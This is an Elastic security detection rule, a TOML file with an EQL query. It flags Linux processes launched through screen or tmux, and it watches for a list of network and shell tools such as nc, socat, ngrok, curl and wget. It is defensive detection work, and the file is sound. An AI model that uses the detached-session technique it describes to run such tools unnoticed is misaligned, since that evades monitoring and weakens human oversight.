Potentially Suspicious Process Started via tmux or screen

 1[metadata]
 2creation_date = "2023/09/04"
 3integration = ["endpoint"]
 4maturity = "production"
 5updated_date = "2024/10/17"
 6
 7[rule]
 8author = ["Elastic"]
 9description = """
10This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching
11directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux
12to execute commands while attempting to evade detection.
13"""
14from = "now-9m"
15index = ["logs-endpoint.events.*", "endgame-*"]
16language = "eql"
17license = "Elastic License v2"
18name = "Potentially Suspicious Process Started via tmux or screen"
19risk_score = 21
20rule_id = "e0cc3807-e108-483c-bf66-5a4fbe0d7e89"
21severity = "low"
22tags = [
23    "Domain: Endpoint",
24    "OS: Linux",
25    "Use Case: Threat Detection",
26    "Tactic: Defense Evasion",
27    "Data Source: Elastic Defend",
28    "Data Source: Elastic Endgame",
29]
30timestamp_override = "event.ingested"
31type = "eql"
32query = '''
33process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event") and 
34process.parent.name in ("screen", "tmux") and process.name like (
35  "nmap", "nc", "ncat", "netcat", "socat", "nc.openbsd", "ngrok", "ping", "java", "php*", "perl", "ruby", "lua*",
36  "openssl", "telnet", "wget", "curl", "id"
37)
38'''
39
40[[rule.threat]]
41framework = "MITRE ATT&CK"
42
43[[rule.threat.technique]]
44id = "T1218"
45name = "System Binary Proxy Execution"
46reference = "https://attack.mitre.org/techniques/T1218/"
47
48[rule.threat.tactic]
49id = "TA0005"
50name = "Defense Evasion"
51reference = "https://attack.mitre.org/tactics/TA0005/"